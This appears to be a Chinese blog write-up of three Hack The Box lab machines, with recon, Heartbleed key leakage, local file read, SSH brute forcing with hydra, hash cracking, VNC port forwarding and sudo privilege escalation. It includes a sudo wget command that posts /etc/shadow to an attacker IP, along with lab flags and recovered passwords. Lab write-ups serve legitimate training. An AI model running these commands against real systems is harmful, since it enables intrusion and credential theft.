HTB-oscplike-valentine+poison+sunday

最新推荐文章于 2023-05-19 22:00:00 发布
最新推荐文章于 2023-05-19 22:00:00 发布
阅读量1.8k 收藏
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53302733/article/details/123887005
版权

HTB-oscplike-valentine+poison+sunday

Valentine

easy难度的Valentine 靶机IP 10.10.10.79

sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.79
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))

dirsearch找到http://10.10.10.79/dev/hype_key有一串十六进制
保存下来 xxd -r -p txt 这里连续的十六进制要加上-p 发现是一段rsa私钥
单凭私钥还不能登录 但是也找不到其他角度了
那么这个莫名其妙的443有没有可能是heartbleed呢
nmap -sV --script=ssl-heartbleed 10.10.10.79 还真是
searchsploit攻击发现了一串text 解码之后是heartbleedbelievethehype
用hype为用户ssh连上去 说我的私钥太open了 可能是open的帅哥就会遇到open的私钥吧
把权限改成400 拿到user的flag e6710a5464769fd5fcd216e076961750

linpeas发现它root执行了tmux 跟着直接执行就root了
f1bb6d759df1f272914ebbc9ed7765b2

请添加图片描述

Poison

medium难度的poison 靶机IP 10.10.10.84

sudo nmap -sC -sV -A -p- -Pn --min-rate=5000 10.10.10.84
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)

80进去发现有个框可以查看指定的php文件 但是是可以文件读取的
请添加图片描述

用户是charix 同时在给出的pwdbackup.txt中有一段加密字符说至少加密了十三次
看着就是base64 直接手动嗯解 最后得到Charix!2#4%6&8(0
直接以此ssh连上去 得到user.txt eaacdfb2d141b72a589233063604209c
有一说一越早期的htb机子越给我一种ctf的感觉 现在新的机子感觉比较贴近现实一些

首先看到目录下还有个secret.zip 直接拿上面的密码解开 是一串不知道什么勾八的字符串
提权常规传个linpeas扫扫 看到root执行了Xvnc允许客户端远程连接
那么我们看看监听的是哪个端口netstat -anl 看到一个反常的5901
那么思路就来了 首先把5901映射出来 然后拿secret作为凭据连接vncserver

ssh -L 127.0.0.1:5901:127.0.0.1:5901 charix@10.10.10.84 端口转发
vncviewer -passwd secret 127.0.0.1:5901 连接vnc 拿到root权限看到flag
716d04b188419cf2bb99d891272361f5 打完
请添加图片描述

Sunday

easy难度的sunday 靶机IP 10.10.10.76

79/tcp open finger?
111/tcp open rpcbind 2-4 (RPC #100000)
515/tcp open printer?
6787/tcp open ssl/http Apache httpd 2.4.33 ((Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14)
22022/tcp open ssh OpenSSH 7.5 (protocol 2.0)

这都什么勾八端口 finger搜了一下发现是一个查询程序 可以爆破登录
./finger-user-enum.pl -U rockyou.txt -t 10.10.10.76:79
看到用户root sammy sunny
hydra -l sunny -P /usr/share/seclists/Usernames/Names/names.txt -s 22022 10.10.10.76 ssh -f
可以爆破出密码sunday 连上去拿到user的flag
a3d9498027ca5187ba1793943ee8a598

连上去后在根目录看到一个backup文件夹 里面的shadow.backup保存了密码的hash
john爆破后密码是cooldude! 而su sammy后sudo -l 发现root权限执行wget
sudo wget --post-file=/etc/shadow 10.10.14.21:789直接把shadow传过去把root密码爆破了
但是爆破了一会儿我感觉不太对 要是爆破的话第一步就可以直接爆破了
这里可以直接读root.txt 也可以直接把root密码换了再让sammy读回去覆写 都行
拿下root的flag

ore0
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
0x06 HackTheBox系列之 sunday实战
boss111的专栏
05-07 374
一 实验简介 目标IP:10.129.222.164 针对79端口破解 ​ ┌──(root💀kali)-[~/hackthebox/htb_tools/finger-user-enum-1.0] └─# ./finger-user-enum.pl -U /usr/share/SecLists/Usernames/Names/names.txt -t 10.129.222.164 Starting finger-user-enum v1.0 ( http://pentestmonkey.net/to
HTB-Valentine
TA不懒,但还没有添加简介
08-05 400
HTB-Valentine
HTB-Sunday
TA不懒,但还没有添加简介
08-06 206
HTB-Sunday
Valentine
weixin_45007073的博客
10-23 1782
Valentine靶机信息信息收集 靶机信息 信息收集 可以看到主机开放了web服务和ssh服务 访问其web服务的时候,就只有一张图片,查看代码源码啥的都没有,但是这张图片的心脏在滴血,我们不难猜到是心脏滴血漏洞吧 那么我们想用脚本检测一下是否存在心脏滴血漏洞, ...
HTB靶机012-Valentine-WP
灰蜗牛
05-17 919
HTB靶机012-Valentine-WriteUp
shaper-scripts:示例防火墙 + HTB + IMQ
05-29
信息 ifconfig eth0: flags=4163<UP> mtu 1500 inet 192.168.120.160 网络掩码 255.255.255.0 广播 192.168.120.255 inet6:80:40ffab0c0c 前缀:80:40ffab0c00c 前缀:280:4000c0c e8:fa:b3 txqueuelen 1000 ...
ROS3.30 +HTB+DSCP-L7
10-11
ROS3.30 +HTB+DSCP-L7
HTB-Solutions
03-09
【标题】"HTB-Solutions" 提供的内容可能与网络安全平台 Hack The Box(HTB)有关,这通常指的是用户在该平台上完成的各种挑战的解决方案集。Hack The Box 是一个在线平台,让网络安全爱好者和专业人士可以通过解决...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标题】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBox(HTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
valentine
weixin_30262255的博客
02-14 79
转载于:https://www.cnblogs.com/vanuan/archive/2006/02/14/9576182.html
HTB靶机014-Sunday-WP
灰蜗牛
05-19 675
HTB靶机014-Sunday-WP finger服务利用、sudoer提权
vulnhub-CH4INRULZ
Starr
03-10 1342
文章目录1. 信息搜集主机发现端口扫描目录扫描2. Exploitftp/sshhttp提权 文章目录1. 信息搜集主机发现端口扫描目录扫描2. Exploitftp/sshhttp提权 靶场地址:https://www.vulnhub.com/entry/ch4inrulz-101,247/ 1. 信息搜集 主机发现 arp-scan 10.10.10.167 00:0c:29:c5:a1:1a VMware, Inc. 端口扫描 sudo nmap -Pn -O -sV 10.10.
Hack the Zico2 VM (CTF Challenge)
whyrookie的博客
08-21 270
下载链接: Download this VM here:https://download.vulnhub.com/zico/zico2.ova 端口扫描: ╰─ nmap -p1-65535 -sV -sC -A 10.10.202.150Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-27 15:54 CSTNmap scan report for 10.10.202.150Host is up (0.00080s latency).N...
Vulnhub 靶机 Quaoar write up wordpresscms 漏洞利用上传插件 getshell wp-config 获取到数据库账号密码 用于ssh登录提权
YouthBelief的博客
12-29 2388
0x00 环境搭建 下载地址 https://download.vulnhub.com/hackfest2016/Quaoar.ova 运行环境 Virtual Box 仅主机网络 kali 搭建同网卡 目标 root权限 flag文件 0x01 信息收集 靶机ip探测 nmap -sP 192.168.56.0/24 192.168.56.109 端口服务探测识别 nmap -sC -sV -A -p- 192.168.56.109 -o port.txt 22/tcp
Vulnhub Bsides Vancouver 2018
zhaji001
01-02 3882
简介:  靶机下载URL: https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/#release 虚拟机需要使用Virtualbox 直接导入VM, 攻击机器使用kali linux 如果你为了方便可不使用桥接模式,直接设置VM和kali在同一IP即可。如果在环境中有太多的机器就不太好分辨目标IP。 0x001 信...
Vulnhub 靶机 BsidesVancouver2018 write up ftp匿名访问 字典 ssh爆破 sudo -l提权 2wordpress 模板getshell 777文件定时任务提权
YouthBelief的博客
12-24 1848
Vulnhub 靶机 BsidesVancouver2018 write up0x00 靶机搭建0x01 信息收集0x02 漏洞挖掘21ftp思路22 ssh思路80http 思路步骤一:ftp匿名访问步骤二:ssh爆破通过ssh拿下,再试试 web方向看存在什么漏洞步骤三:web探测步骤四:wordpress漏洞利用步骤五:反弹shell0x03 提权步骤六:提权0x04 总结 0x00 靶机搭建 下载链接 https://download.vulnhub.com/bsidesvancouver2
【甄选靶场】Vulnhub百个项目渗透——项目四十四:44-pegasus:1(格式化字符串缓冲区溢出,nfs提权)
人间体佐菲的博客
10-23 727
【甄选靶场】Vulnhub百个项目渗透——项目四十四:44-pegasus:1(格式化字符串缓冲区溢出,nfs提权)
Hack the box靶机 Sunday
菜浪马废的博客
05-21 349
心烦!!! 单身的时候一个人过情人节!!! 不单身了还一个人过情人节!!! 继续学! 我需要的是知识! 我需要女朋友么?! 开玩笑! 两个账号
cozyhosting+htb
最新发布
09-20
CSDN AI助手(C知道):对于你提到的 "cozyhosting htb",我理解的是你在提及CTF平台Hack The Box中的CozyHosting机器。CozyHosting是一个涉及Web应用安全的挑战。你可能需要在Hack The Box平台上登录并进行相关操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值